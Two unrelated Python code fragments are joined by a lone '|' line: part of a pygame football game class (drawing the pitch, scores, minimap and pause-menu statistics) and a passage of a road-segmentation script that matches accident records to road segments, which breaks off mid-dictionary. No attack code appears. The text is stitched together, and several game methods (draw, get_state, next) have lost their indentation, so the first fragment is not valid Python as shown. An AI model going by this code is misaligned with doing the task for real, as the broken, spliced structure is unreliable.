    text_h = text.get_height()
    # vertical placement is the same for every alignment
    mid_y = round(rect[1] + rect[3]/2)
    top = round(mid_y - text_h/2)
    if align == 'left':
        left = round(rect[0])
    elif align == 'right':
        left = round(rect[0] + rect[2] - text_w)
    else:
        # centred: note the midpoint is rounded before the half-width is
        # subtracted, matching the two-step rounding of the rest of the file
        mid_x = round(rect[0] + rect[2]/2)
        left = round(mid_x - text_w/2)
    win.blit(text, (left, top))
def goal_draw(self, win):
    """
    Display the current score (goals for each side)

    Draws two white boxes either side of the top-centre of the screen and
    renders each team's goal count (stats.goals is keyed by team id 1/2).
    """
    goal1_rect = (W//2 - GOAL_DISP_SIZE - 2*LINE_WIDTH,
                  0, GOAL_DISP_SIZE, GOAL_DISP_SIZE)
    goal2_rect = (W//2 + 2*LINE_WIDTH, 0, GOAL_DISP_SIZE, GOAL_DISP_SIZE)
    goal_font = pygame.font.Font(FONT_ROBOTO, FONT_SIZE)
    pygame.draw.rect(win, (255, 255, 255), goal1_rect)
    pygame.draw.rect(win, (255, 255, 255), goal2_rect)
    text = goal_font.render(str(self.stats.goals[1]), True, (0, 0, 0))
    self.text_draw(win, text, goal1_rect)
    text = goal_font.render(str(self.stats.goals[2]), True, (0, 0, 0))
    self.text_draw(win, text, goal2_rect)
def overlay_draw(self, win):
    """
    Draw the minimap overlay: a scaled-down pitch showing the camera window,
    goals, penalty boxes, every player and the ball.
    """
    # map full-pitch coordinates / rectangles into the overlay rectangle
    scale_rect = lambda x,y,w,h: (OVER_TOP_LEFT.x + x*OVER_SIZE.x//W, OVER_TOP_LEFT.y + y*OVER_SIZE.y//H, w*OVER_SIZE.x//W, h*OVER_SIZE.y//H)
    scale_pt = lambda x,y: (OVER_TOP_LEFT.x + x*OVER_SIZE.x//W, OVER_TOP_LEFT.y + y*OVER_SIZE.y//H)
    r = scale_rect(0,0,W,H)
    # translucent dark backdrop so the minimap reads over the pitch
    s = pygame.Surface((r[2],r[3]), pygame.SRCALPHA)
    s.fill((0,0,0,75))
    win.blit(s, (r[0],r[1]))
    pygame.draw.rect(win, (255,255,255), r, LINE_WIDTH)
    # rectangle showing the portion of the pitch currently in camera view
    pygame.draw.rect(win, (255,255,255),
                     scale_rect(self.cam.c.x - self.cam.params['pt'].x//2, self.cam.c.y - self.cam.params['pt'].y//2,
                                self.cam.params['pt'].x, self.cam.params['pt'].y), LINE_WIDTH)
    pygame.draw.rect(win, (255, 255, 255), scale_rect(0.95*W-LINE_WIDTH//2,
                     GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # right penalty
    pygame.draw.rect(win, (255, 255, 255), scale_rect(LINE_WIDTH//2,
                     GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # left penalty
    pygame.draw.rect(win, self.team2.color,scale_rect(W - 3*LINE_WIDTH,
                     GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # right goal
    pygame.draw.rect(win, self.team1.color,scale_rect(0,
                     GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # left goal
    pygame.draw.rect(win, (255, 255, 255),
                     scale_rect(W//2 - LINE_WIDTH//2, 0, LINE_WIDTH, H)) # mid line
    # players drawn as small team-coloured dots
    for player in self.team1.players:
        pygame.draw.circle(win, self.team1.color, scale_pt(*player.pos.val),
                           PLAYER_RADIUS//3)
    for player in self.team2.players:
        pygame.draw.circle(win, self.team2.color, scale_pt(*player.pos.val),
                           PLAYER_RADIUS//3)
    # ball dot; PLAYER_CENTER offsets the ball position to its visual centre
    pygame.draw.circle(win, (42,42,42), scale_pt(*(self.ball.pos + PLAYER_CENTER).val),
                       BALL_RADIUS)
def field_draw(self, win, hints):
    """
    Draw the football pitch

    Attributes:
        win (pygame.display): window for rendering
        hints (bool): If (movement-based) hints are to be shown
    """
    win.fill((0,0,0)) # constant black
    self.cam.rect(win, (14, 156, 23), (0,0,W,H)) # green ground
    self.cam.rect(win, (255, 255, 255), (0, 0, W -
                  LINE_WIDTH, H - LINE_WIDTH), LINE_WIDTH) # border
    self.cam.rect(win, (255, 255, 255),
                  (W//2 - LINE_WIDTH//2, 0, LINE_WIDTH, H)) # mid line
    self.cam.circle(win, (255, 255, 255), (W//2, H//2),
                    H//10, LINE_WIDTH) # mid circle
    self.cam.rect(win, (255, 255, 255), (0.9*W - LINE_WIDTH //
                  2, 0.2*H, 0.1*W, 0.6*H), LINE_WIDTH) # right D
    self.cam.rect(win, (255, 255, 255), (LINE_WIDTH//2,
                  0.2*H, 0.1*W, 0.6*H), LINE_WIDTH) # left D
    self.cam.rect(win, (255, 255, 255), (0.95*W-LINE_WIDTH//2,
                  GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # right penalty
    self.cam.rect(win, (255, 255, 255), (LINE_WIDTH//2,
                  GOAL_POS[0]*H, 0.05*W, (GOAL_POS[1]-GOAL_POS[0])*H), LINE_WIDTH) # left penalty
    self.cam.rect(win, self.team2.color, (W - 3*LINE_WIDTH,
                  GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # right goal
    self.cam.rect(win, self.team1.color, (0,
                  GOAL_POS[0]*H, 3*LINE_WIDTH, (GOAL_POS[1]-GOAL_POS[0])*H)) # left goal
    # the minimap is only useful when the camera shows part of the pitch
    if self.cam.mode != 'full':
        self.overlay_draw(win)
    if hints:
        field_font = pygame.font.Font(FONT_ROBOTO, FONT_SIZE//2)
        text_esc = field_font.render('Esc: pause', True, (0, 100, 0))
        text_back = field_font.render(
            'Backspace: return to menu', True, (0, 100, 0))
        text_space = field_font.render(
            'Space: Toggle formation', True, (0, 100, 0))
        text_team1_form = field_font.render(
            f'Maintain formation: {"ON" if self.team1.maintain_formation else "OFF"}', True, (0, 100, 0))
        self.text_draw(win, text_esc, (W - 2*0.1*W - 3*LINE_WIDTH,
                       3*LINE_WIDTH, 2*0.1*W, 0.05*H), align='right')
        self.text_draw(win, text_space, (W - 3*0.1*W - 3*LINE_WIDTH,
                       3*LINE_WIDTH, 2*0.1*W, 0.05*H), align='left')
        self.text_draw(win, text_back, (W - 0.2*W - 3*LINE_WIDTH,
                       3*LINE_WIDTH + 0.05*H, 0.2*W, 0.05*H), align='left')
        self.text_draw(win, text_team1_form, (3*LINE_WIDTH,
                       3*LINE_WIDTH, 0.2*W, 0.05*H), align='left')
        # NOTE(review): the debug overlay uses field_font, which is only
        # defined when hints is True, so it is nested here -- confirm debug
        # visuals are meant to be hidden when hints are off.
        if self.debug:
            self.cam.circle(win, (0, 200, 100), (0, H//2),
                            AI_SHOOT_RADIUS, LINE_WIDTH) # AI Shoot radius
            self.cam.circle(win, (0, 200, 100), (W, H//2),
                            AI_SHOOT_RADIUS, LINE_WIDTH) # AI shoot radius
            text_debug = field_font.render(
                f'Developer mode: ON', True, (0, 100, 0))
            self.text_draw(win, text_debug, (3*LINE_WIDTH, 3*LINE_WIDTH +
                           0.05*H, 0.2*W, 0.05*H), align='left') # Developer model
def draw(self, win, hints=True):
"""
Draw the entire game
Calls ```field_draw()``` along with the ```draw()``` methods for each team and the ball
"""
self.field_draw(win, hints=hints)
if hints:
self.goal_draw(win)
self.team1.draw(win, self.cam, debug=self.debug)
self.team2.draw(win, self.cam, debug=self.debug)
self.ball.draw(win, self.cam, debug=self.debug)
def practice_instr_draw(self, win):
    """
    Draw the practice game instructions (shows extra hints and keyboard controls)

    Renders a title plus the shoot (QWE/AD/ZXC keypad layout) and movement
    key bindings in the top-left of the screen.
    """
    title_font = pygame.font.Font(FONT_ROBOTO, FONT_SIZE)
    title_text = title_font.render('PRACTICE', True, (0, 100, 0))
    self.text_draw(win, title_text, (0, 0, W, 0.01*H))
    # monospace font keeps the 3-row key diagram aligned
    field_font = pygame.font.Font(FONT_MONO, FONT_SIZE//2)
    text_shoot1 = field_font.render('        Q W E', True, (0, 100, 0))
    text_shoot2 = field_font.render('Shoot:  A   D', True, (0, 100, 0))
    text_shoot3 = field_font.render('        Z X C', True, (0, 100, 0))
    text_move = field_font.render(f'Move: Arrow keys', True, (0, 100, 0))
    self.text_draw(win, text_move, (3*LINE_WIDTH,
                   3*LINE_WIDTH, 0.2*W, 0.05*H))
    self.text_draw(win, text_shoot1, (3*LINE_WIDTH + 0.2*W, 3 *
                   LINE_WIDTH, 2*0.1*W + 2*LINE_WIDTH, 0.05*H), align='left')
    self.text_draw(win, text_shoot2, (3*LINE_WIDTH + 0.2*W, 3 *
                   LINE_WIDTH + 0.05*H, 2*0.1*W + 2*LINE_WIDTH, 0.05*H), align='left')
    self.text_draw(win, text_shoot3, (3*LINE_WIDTH + 0.2*W, 3*LINE_WIDTH +
                   2*0.05*H, 2*0.1*W + 2*LINE_WIDTH, 0.05*H), align='left')
def bar_draw(self, win, dim, w0, h0, w, h, col, val, debug_text, invert=False):
    """
    Draw a bar in the pause menu (for statistics)

    Attributes:
        win: Main window used for all drawing
        dim ([int]): extra dimensions for the pause menu
        w0 (int): x coordinate of the bar's top left point
        h0 (int): y coordinate of the bar's top left point
        w (int): width of the bar
        h (int): height of the bar
        col ([int]): color of the bar (RGB tuple)
        val (float): % of the bar to fill (between 0 and 1)
        debug_text (str): Text to display in debug mode
        invert (bool): Flip the bar left to right
    """
    W_, H_, W0, H0, pad, min_len = dim
    # complementary colour keeps the label readable on the filled bar
    inv_col = (255-col[0], 255-col[1], 255-col[2])
    if self.debug:
        text = pygame.font.Font(FONT_ROBOTO, FONT_SIZE//3).render(
            debug_text, True, inv_col)
    else:
        text = pygame.font.Font(
            FONT_ROBOTO, FONT_SIZE//3).render(
            f'{round(100*val)}%', True, inv_col)
    # only draw the filled portion when it is long enough to be visible
    if int(val*w) > min_len:
        if invert:
            # fill grows from the right edge towards the left
            pygame.draw.rect(win, col, (round(w0 + w*(1-val)), round(h0),
                                        round(val*w), round(h)))
            self.text_draw(win, text, (round(w0 + w*(1-val)), round(h0),
                                       round(val*w), round(h)))
        else:
            pygame.draw.rect(win, col, (round(w0), round(h0),
                                        round(val*w), round(h)))
            self.text_draw(win, text, (round(w0), round(h0),
                                       round(val*w), round(h)))
    # full-width black outline around the bar
    # NOTE(review): source indentation was ambiguous; the outline is drawn
    # unconditionally here (it spans round(w), the whole bar) -- confirm.
    pygame.draw.rect(win, (0, 0, 0), (round(w0), round(h0),
                                      round(w), round(h)), LINE_WIDTH)
def bar_label_draw(self, win, dim, w0, h0, w, h, text):
    """
    Draw the label of a bar in the pause menu (for statistics)

    Attributes:
        win: Main window used for all drawing
        dim ([int]): extra dimensions for the pause menu
        w0 (int): x coordinate of the bar's top left point
        h0 (int): y coordinate of the bar's top left point
        w (int): width of the bar
        h (int): height of the bar
        text (str): Text to display in the label
    """
    # unpack kept for parity with the other pause-menu helpers
    W_, H_, W0, H0, pad, min_len = dim
    label_font = pygame.font.Font(FONT_ROBOTO, FONT_SIZE//2)
    rendered = label_font.render(text, True, (255, 255, 255))
    self.text_draw(win, rendered, (w0, h0, w, h))
def pause_box_draw(self, win, dim):
    """
    Draw the skeleton of the pause menu (bg, title, exit button)

    Attributes:
        win: Main window used for all drawing
        dim ([int]): extra dimensions for the pause menu
    """
    W_, H_, W0, H0, pad, min_len = dim
    # background and border
    pygame.draw.rect(win, (42, 42, 42), (W0, H0, W_ -
                     LINE_WIDTH, H_ - LINE_WIDTH)) # border
    # Title
    text_title = pygame.font.Font(FONT_ROBOTO, FONT_SIZE).render(
        "Pause Menu", True, (255, 255, 255))
    self.text_draw(win, text_title, (W0 + pad, H0 +
                   0.05*H_, W_ - pad, 0.04*H_))
    # Exit button
    text_close1 = pygame.font.Font(
        FONT_ROBOTO, FONT_SIZE).render("x", True, (255, 0, 0))
    text_close2 = pygame.font.Font(
        FONT_ROBOTO, FONT_SIZE//5).render("(ESCAPE)", True, (255, 0, 0))
    # NOTE(review): the rect heights use 0.05*H (screen height) while every
    # other dimension here is relative to H_ (menu height) -- possibly meant
    # to be 0.05*H_; confirm before changing.
    self.text_draw(win, text_close1, (W0 + 9*0.1*W_ - pad,
                   H0 + 0.03*H_, 0.1*W_, 0.05*H))
    self.text_draw(win, text_close2, (W0 + 9*0.1*W_ - pad,
                   H0 + 0.08*H_, 0.1*W_, 0.05*H))
def pause_draw(self, win):
    """
    Draw the pause menu

    Displays statistics for possession, pass accuracy and shot accuracy:
    one label plus a left (team 1) and right (team 2, mirrored) bar each.
    """
    W_, H_ = int(0.8*W), int(0.8*H)
    W0, H0 = int(0.1*W), int(0.1*H)
    pad = W_*0.02
    min_len = W_*0.01
    dim = [W_, H_, W0, H0, pad, min_len] # extra dimensions for the pause menu
    self.pause_box_draw(win, dim)
    # Possession
    pos = self.stats.get_possession()
    self.bar_label_draw(win, dim,
                        W0, H0 + 0.15*H_, W_, 0.1*H_,
                        "POSSESSION")
    self.bar_draw(win, dim, # team 1
                  W0 + pad, H0 + 0.25*H_, (W_ - 2*pad)/2, 0.05*H_,
                  col=self.team1.color, val=pos[0],
                  debug_text=f'{int(round(100*pos[0],0))} ({self.stats.pos[1]})')
    self.bar_draw(win, dim, # team 2
                  W0 + W_/2, H0 + 0.25*H_, (W_ - 2*pad)/2, 0.05*H_,
                  col=self.team2.color, val=pos[1], invert=True,
                  debug_text=f'{int(round(100*pos[1],0))} ({self.stats.pos[2]})')
    # Pass accuracy
    pa = self.stats.get_pass_acc()
    self.bar_label_draw(win, dim,
                        W0, H0 + 0.35*H_, W_, 0.1*H_,
                        "PASS ACCURACY")
    self.bar_draw(win, dim, # team 1
                  W0 + pad, H0 + 0.45*H_, (W_ - 2*pad)/2, 0.05*H_,
                  col=self.team1.color, val=pa[0],
                  debug_text=f'{int(round(100*pa[0],0))} ({self.stats.pass_acc[1]["succ"]}/{self.stats.pass_acc[1]["succ"]+self.stats.pass_acc[1]["fail"]})')
    self.bar_draw(win, dim, # team 2
                  W0 + W_/2, H0 + 0.45*H_, (W_ - 2*pad)/2, 0.05*H_,
                  col=self.team2.color, val=pa[1], invert=True,
                  debug_text=f'{int(round(100*pa[1],0))} ({self.stats.pass_acc[2]["succ"]}/{self.stats.pass_acc[2]["succ"]+self.stats.pass_acc[2]["fail"]})')
    # Shot accuracy
    sa = self.stats.get_shot_acc()
    self.bar_label_draw(win, dim,
                        W0, H0 + 0.55*H_, W_, 0.1*H_,
                        "SHOT ACCURACY")
    # BUG FIX: team 1's debug text previously showed team 2's numbers
    # (sa[1] and shot_acc[2]) -- a copy-paste error; it now uses sa[0]
    # and shot_acc[1] to match val=sa[0].
    self.bar_draw(win, dim, # team 1
                  W0 + pad, H0 + 0.65*H_, (W_ - 2*pad)/2, 0.05*H_,
                  col=self.team1.color, val=sa[0],
                  debug_text=f'{int(round(100*sa[0],0))} ({self.stats.shot_acc[1]["succ"]}/{self.stats.shot_acc[1]["succ"]+self.stats.shot_acc[1]["fail"]})')
    self.bar_draw(win, dim, # team 2
                  W0 + W_/2, H0 + 0.65*H_, (W_ - 2*pad)/2, 0.05*H_,
                  col=self.team2.color, val=sa[1], invert=True,
                  debug_text=f'{int(round(100*sa[1],0))} ({self.stats.shot_acc[2]["succ"]}/{self.stats.shot_acc[2]["succ"]+self.stats.shot_acc[2]["fail"]})')
def get_state(self):
"""
Create a state object that summarizes the entire game
```
state = {
'team1': {
'players' # list of the team player's coordinates
'goal_x' # The x-coordinate of their goal post
},
'team2': {
'players' # list of the team player's coordinates
'goal_x' # The x-coordinate of their goal post
},
'ball' # Position of the ball
}
```
"""
pos1 = [player.pos for player in self.team1.players]
pos2 = [player.pos for player in self.team2.players]
return {
'team1': {
'players': self.team1.players,
'goal_x': self.team1.goal_x,
},
'team2': {
'players': self.team2.players,
'goal_x': self.team2.goal_x,
},
'ball': self.ball,
}
def next(self):
"""
Move the game forward by 1 frame
Passes state objects to the teams and pass their actions to ```move_next()```
"""
a1 = self.team1.move(self.state_prev, self.state, self.rewards)
a2 = self.team2.move(self.state_prev, self.state, self.rewards)
self.state_prev, self.state, self.rewards = self.move_next(a1, a2)
def move_next(self, a1, a2):
    """
    Update the players' and ball's internal state based on the teams' actions

    Attributes:
        a1 (list): list of actions (1 for each player) in team 1
        a2 (list): list of actions (1 for each player) in team 2

    Each action must be a key in the ```ACT``` dictionary found in ```const.py```

    Returns (state_prev, state, rewards); rewards is currently always 0.
    """
    # snapshot the state before applying this frame's actions
    state_prev = self.get_state()
    self.team1.update(a1, self.ball) # Update team's state
    self.team2.update(a2, self.ball)
    # Check for collision between players
    self.collision(self.team1, self.team2, self.ball)
    self.ball.update(self.team1, self.team2, a1, a2,
                     self.stats) # Update ball's state
    # camera follows the ball
    self.cam.move(self.ball.pos.x, self.ball.pos.y)
    state = self.get_state()
    return state_prev, state, 0
|
#!/usr/bin/env python
"""Loads records and roads shapefile, outputs data needed for training"""
import argparse
import csv
from dateutil import parser
from dateutil.relativedelta import relativedelta
import fiona
from functools import partial
import itertools
import logging
from math import ceil
import multiprocessing
import os
import pyproj
import pytz
import rtree
from shapely.geometry import mapping, shape, LineString, MultiPoint, Point
from shapely.ops import transform, unary_union
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger()
def should_keep_road(road, road_shp, record_buffers_index):
    """Returns True if road should be considered for segmentation

    :param road: Dictionary representation of the road (with properties)
    :param road_shp: Shapely representation of the road
    :param record_buffers_index: RTree index of the record_buffers
    """
    # If the road has no nearby records, then we can discard it early on.
    # This provides a major optimization since the majority of roads don't have recorded accidents.
    if not len(list(record_buffers_index.intersection(road_shp.bounds))):
        return False
    properties = road['properties']
    # Keep any tagged OSM highway except foot paths.
    if (properties.get('highway') is not None
            and properties['highway'] != 'path'
            and properties['highway'] != 'footway'):
        return True
    # We're only interested in non-bridge, non-tunnel highways
    # 'class' is optional, so only consider it when it's available.
    # BUG FIX: the original expression was
    #   'class' not in p or p['class'] == 'highway' and p['bridge'] == 0 and p['tunnel'] == 0
    # where `and` binds tighter than `or`, so any road WITHOUT a 'class' key
    # was kept even when it was a bridge or tunnel -- contradicting the
    # comment above.  Parenthesized to match the documented intent; missing
    # bridge/tunnel keys default to 0 (kept), preserving the old behaviour
    # for rows that lack those columns.
    if (('class' not in properties or properties['class'] == 'highway')
            and properties.get('bridge', 0) == 0
            and properties.get('tunnel', 0) == 0):
        return True
    return False
def read_roads(roads_shp, records, buffer_size):
    """Reads shapefile and extracts roads and projection

    :param roads_shp: Path to the shapefile containing roads
    :param records: List of shapely geometries representing record points
    :param buffer_size: Number of units to buffer record for checking if road should be kept
    :returns: Tuple of (list of kept road geometries, shapefile bounds)
    """
    # Create a spatial index for record buffers to efficiently find intersecting roads
    record_buffers_index = rtree.index.Index()
    for idx, record in enumerate(records):
        record_point = record['point']
        # only the buffer's bounding box is needed for the coarse rtree filter
        record_buffer_bounds = record_point.buffer(buffer_size).bounds
        record_buffers_index.insert(idx, record_buffer_bounds)

    # NOTE(review): the fiona collection is never closed; consider a context
    # manager if this is called more than once per process.
    shp_file = fiona.open(roads_shp)
    roads = []
    logger.info('Number of total roads in shapefile: {:,}'.format(len(shp_file)))
    for road in shp_file:
        road_shp = shape(road['geometry'])
        # coarse record-proximity and road-type filter
        if should_keep_road(road, road_shp, record_buffers_index):
            roads.append(road_shp)
    return (roads, shp_file.bounds)
def get_intersections(roads):
    """Calculates the intersection points of all roads

    :param roads: List of shapely geometries representing road segments
    :returns: MultiPoint of de-duplicated intersection points

    NOTE(review): `geometry.type` and direct iteration over multi-part
    geometries are shapely 1.x idioms (removed in shapely 2, which requires
    `.geom_type` and `.geoms`) -- confirm the pinned shapely version.
    """
    intersections = []
    # O(n^2) pairwise check; callers keep n small by tiling the road network
    for road1, road2 in itertools.combinations(roads, 2):
        if road1.intersects(road2):
            intersection = road1.intersection(road2)
            if 'Point' == intersection.type:
                intersections.append(intersection)
            elif 'MultiPoint' == intersection.type:
                intersections.extend([pt for pt in intersection])
            elif 'MultiLineString' == intersection.type:
                # overlapping (collinear) roads: keep the end points of the
                # shared stretch as the "intersections"
                multiLine = [line for line in intersection]
                first_coords = multiLine[0].coords[0]
                last_coords = multiLine[len(multiLine)-1].coords[1]
                intersections.append(Point(first_coords[0], first_coords[1]))
                intersections.append(Point(last_coords[0], last_coords[1]))
            elif 'GeometryCollection' == intersection.type:
                # mixed result: recurse over its members
                intersections.extend(get_intersections(intersection))
    # The unary_union removes duplicate points
    unioned = unary_union(intersections)
    # Ensure the result is a MultiPoint, since calling functions expect an iterable
    if 'Point' == unioned.type:
        unioned = MultiPoint([unioned])
    return unioned
def get_intersection_buffers(roads, road_bounds, intersection_buffer_units, tile_max_units):
    """Buffers all intersections

    :param roads: List of shapely geometries representing road segments
    :param road_bounds: Bounding box of the roads shapefile
    :param intersection_buffer_units: Number of units to use for buffer radius
    :param tile_max_units: Maxium number of units for each side of a tile
    :returns: Unary union of all buffered intersection points
    """
    # As an optimization, the road network is divided up into a grid of tiles,
    # and intersections are calculated within each tile.
    def roads_per_tile_iter():
        """Generator which yields a set of roads for each tile"""
        min_x, min_y, max_x, max_y = road_bounds
        bounds_width = max_x - min_x
        bounds_height = max_y - min_y
        # number of tiles per axis, each no wider/taller than tile_max_units
        x_divisions = ceil(bounds_width / tile_max_units)
        y_divisions = ceil(bounds_height / tile_max_units)
        tile_width = bounds_width / x_divisions
        tile_height = bounds_height / y_divisions

        # Create a spatial index for roads to efficiently match up roads to tiles
        logger.info('Generating spatial index for intersections')
        roads_index = rtree.index.Index()
        for idx, road in enumerate(roads):
            roads_index.insert(idx, road.bounds)

        logger.info('Number of tiles: {}'.format(int(x_divisions * y_divisions)))
        for x_offset in range(0, int(x_divisions)):
            for y_offset in range(0, int(y_divisions)):
                # roads whose bounding boxes touch this tile; a road spanning
                # several tiles is deliberately processed in each of them
                road_ids_in_tile = roads_index.intersection([
                    min_x + x_offset * tile_width,
                    min_y + y_offset * tile_height,
                    min_x + (1 + x_offset) * tile_width,
                    min_y + (1 + y_offset) * tile_height
                ])
                roads_in_tile = [roads[road_id] for road_id in road_ids_in_tile]
                # a single road cannot intersect anything
                if len(roads_in_tile) > 1:
                    yield roads_in_tile

    # Allocate one worker per core, and parallelize the discovery of intersections
    pool = multiprocessing.Pool(multiprocessing.cpu_count())
    tile_intersections = pool.imap(get_intersections, roads_per_tile_iter())
    pool.close()
    pool.join()

    logger.info('Buffering intersections')
    # Note: tile_intersections is a list of multipoints (which is a list of points).
    # itertools.chain.from_iterable flattens the list into a list of single points.
    buffered_intersections = [intersection.buffer(intersection_buffer_units)
                              for intersection in itertools.chain.from_iterable(tile_intersections)]

    # If intersection buffers overlap, union them to treat them as one
    logger.info('Performing unary union on buffered intersections')
    return unary_union(buffered_intersections)
def split_line(line, max_line_units):
    """Checks the line's length and recursively splits in half if larger than the configured max

    :param line: Shapely line to be split
    :param max_line_units: The maximum allowed length of the line
    :returns: List of LineStrings, each no longer than max_line_units
    """
    if line.length <= max_line_units:
        return [line]

    half_length = line.length / 2
    coords = list(line.coords)
    for idx, point in enumerate(coords):
        # distance of this vertex along the line
        proj_dist = line.project(Point(point))
        if proj_dist == half_length:
            # An existing vertex sits exactly at the midpoint: split there.
            # BUG FIX: the original returned the two halves WITHOUT recursing,
            # so when line.length > 2 * max_line_units the halves could still
            # exceed the maximum.  Recurse on both halves, as the branch
            # below already did.
            return (split_line(LineString(coords[:idx + 1]), max_line_units) +
                    split_line(LineString(coords[idx:]), max_line_units))
        if proj_dist > half_length:
            # midpoint falls inside a segment: interpolate a new vertex there
            mid_point = line.interpolate(half_length)
            head_line = LineString(coords[:idx] + [(mid_point.x, mid_point.y)])
            tail_line = LineString([(mid_point.x, mid_point.y)] + coords[idx:])
            return split_line(head_line, max_line_units) + split_line(tail_line, max_line_units)
def get_intersection_parts(roads, int_buffers, max_line_units):
    """Finds all segments that intersect the buffers, and all that don't

    :param roads: List of shapely geometries representing road segments
    :param int_buffers: List of shapely polygons representing intersection buffers
    :param max_line_units: Maximum allowed length for a non-intersection segment
    :returns: Tuple of (intersection multilines, split non-intersecting segments)
    """
    # Create a spatial index for intersection buffers to efficiently find intersecting segments
    int_buffers_index = rtree.index.Index()
    for idx, intersection_buffer in enumerate(int_buffers):
        int_buffers_index.insert(idx, intersection_buffer.bounds)

    # buffer index -> list of road pieces clipped to that buffer
    segments_map = {}
    non_int_lines = []
    for road in roads:
        road_int_buffers = []
        # rtree gives candidates by bounding box; confirm true intersection
        for idx in int_buffers_index.intersection(road.bounds):
            int_buffer = int_buffers[idx]
            if int_buffer.intersects(road):
                if idx not in segments_map:
                    segments_map[idx] = []
                segments_map[idx].append(int_buffer.intersection(road))
                road_int_buffers.append(int_buffer)
        # Collect the non-intersecting segments
        if len(road_int_buffers) > 0:
            # what's left of the road once all its buffers are carved out
            diff = road.difference(unary_union(road_int_buffers))
            # NOTE(review): `.type` and iterating a MultiLineString directly
            # are shapely 1.x idioms (shapely 2 needs .geom_type / .geoms).
            if 'LineString' == diff.type:
                non_int_lines.append(diff)
            elif 'MultiLineString' == diff.type:
                non_int_lines.extend([line for line in diff])
        else:
            non_int_lines.append(road)

    # Union all lines found within a buffer, treating them as a single unit
    int_multilines = [unary_union(lines) for _, lines in segments_map.items()]

    # Split any long non-intersecting segments. It's not important that they
    # be equal lengths, just that none of them are exceptionally long.
    split_non_int_lines = []
    for line in non_int_lines:
        split_non_int_lines.extend(split_line(line, max_line_units))

    # Return a tuple of intersection multilines and non-intersecting segments
    return (int_multilines, split_non_int_lines)
def read_records(records_csv, road_projection, record_projection, tz, col_id,
                 col_x, col_y, col_occurred):
    """Reads records csv, projects points, and localizes datetimes
    :param records_csv: Path to CSV containing record data
    :param road_projection: Projection CRS for road data
    :param record_projection: Projection CRS for record data
    :param tz: Timezone id for record data
    :param col_id: Record id column name
    :param col_x: Record x-coordinate column name
    :param col_y: Record y-coordinate column name
    :param col_occurred: Record occurred datetime column name
    :returns: Tuple of (records, min occurred datetime, max occurred datetime)
    """
    # Create a function for projecting a point from the record CRS into the road CRS
    project = partial(
        pyproj.transform,
        pyproj.Proj(record_projection),
        pyproj.Proj(road_projection)
    )
    records = []
    min_occurred = None
    max_occurred = None
    # NOTE(review): 'rb' matches the Python 2 csv module; under Python 3 this
    # should be mode 'r' with newline='' -- confirm target interpreter.
    with open(records_csv, 'rb') as records_file:
        csv_reader = csv.DictReader(records_file)
        for row in csv_reader:
            try:
                parsed_dt = parser.parse(row[col_occurred])
                # Localize datetimes that aren't timezone-aware
                occurred = parsed_dt if parsed_dt.tzinfo else tz.localize(parsed_dt)
            except (KeyError, ValueError, OverflowError, TypeError):
                # Skip records with a missing or unparseable datetime. The
                # explicit tuple replaces a bare `except:`, which also
                # swallowed KeyboardInterrupt and SystemExit.
                continue
            # Track min and max occurred datetimes; they're used later for
            # the per-year offset aggregations.
            if not min_occurred or occurred < min_occurred:
                min_occurred = occurred
            if not max_occurred or occurred > max_occurred:
                max_occurred = occurred
            records.append({
                'id': row[col_id],
                'point': transform(project, Point(float(row[col_x]), float(row[col_y]))),
                'occurred': occurred
            })
    return records, min_occurred, max_occurred
def match_records_to_segments(records, combined_segments, match_tolerance):
    """Matches up each record to its nearest segment
    :param records: List of record objects
    :param combined_segments: List of Shapely objects representing road segments (+ intersections)
    :param match_tolerance: Number of units to buffer for checking a record/road match
    """
    # Index segment bounding boxes so the candidates near a record can be
    # found without scanning every segment.
    segments_index = rtree.index.Index()
    for seg_id, segment in enumerate(combined_segments):
        segments_index.insert(seg_id, segment.bounds)
    segments_with_records = {}
    for record in records:
        point = record['point']
        # Records rarely sit exactly on a line, so buffer the point by the
        # match tolerance to capture nearby segments.
        search_bounds = point.buffer(match_tolerance).bounds
        candidates = [
            (seg_id, combined_segments[seg_id].distance(point))
            for seg_id in segments_index.intersection(search_bounds)
        ]
        if candidates:
            best_id, _ = min(candidates, key=lambda pair: pair[1])
            segments_with_records.setdefault(best_id, []).append(record)
    return segments_with_records
def get_segments_with_data(combined_segments, segments_with_records, min_occurred, max_occurred):
    """Adds calculated data to each segment
    :param combined_segments: List of Shapely objects representing road segments (+ intersections)
    :param segments_with_records: Dict mapping segment index to its matched record objects
    :param min_occurred: Minimum occurred date of records
    :param max_occurred: Maximum occurred date of records
    :returns: Tuple of (schema dict, list of (segment, data) tuples)
    """
    # Define the schema used for writing to a shapefile (and a csv).
    # The schema is defined here, because we need to add some variable
    # properties to it later on in the function which is dependent on
    # the number of years of data available. It's also good to have it
    # here since the data being generated here needs to conform to this
    # schema, so a future edit will only involve modifying this function.
    schema = {
        'geometry': 'MultiLineString',
        'properties': {
            # Unique identifier for this segment
            'id': 'int',
            # Length of the segment
            'length': 'float',
            # Number of lines in the segment (measure of intersection complexity)
            'lines': 'int',
            # X-coordinate of segment centroid
            'pointx': 'float',
            # Y-coordinate of segment centroid
            'pointy': 'float',
            # Total number of records matched
            'records': 'int'
        }
    }
    # Figure out the number of full years of data we have so we can create offset aggregations.
    # A year is defined here as 52 weeks, in case we eventually want to do week/month aggregations.
    # Floor division keeps this an int; under Python 3 true division yields a
    # float, which would crash range() below.
    num_years = (max_occurred - min_occurred).days // (52 * 7)
    # Create the set of year ranges
    year_ranges = [
        (max_occurred - relativedelta(years=offset),
         max_occurred - relativedelta(years=(offset + 1)),
         't{}records'.format(offset))
        for offset in range(num_years)
    ]
    # Add fields to the schema for each year range
    for _, _, records_label in year_ranges:
        # Number of records within the offset period
        schema['properties'][records_label] = 'int'
    segments_with_data = []
    for idx, segment in enumerate(combined_segments):
        is_intersection = 'MultiLineString' == segment.type
        records = segments_with_records.get(idx)
        data = {
            'id': idx,
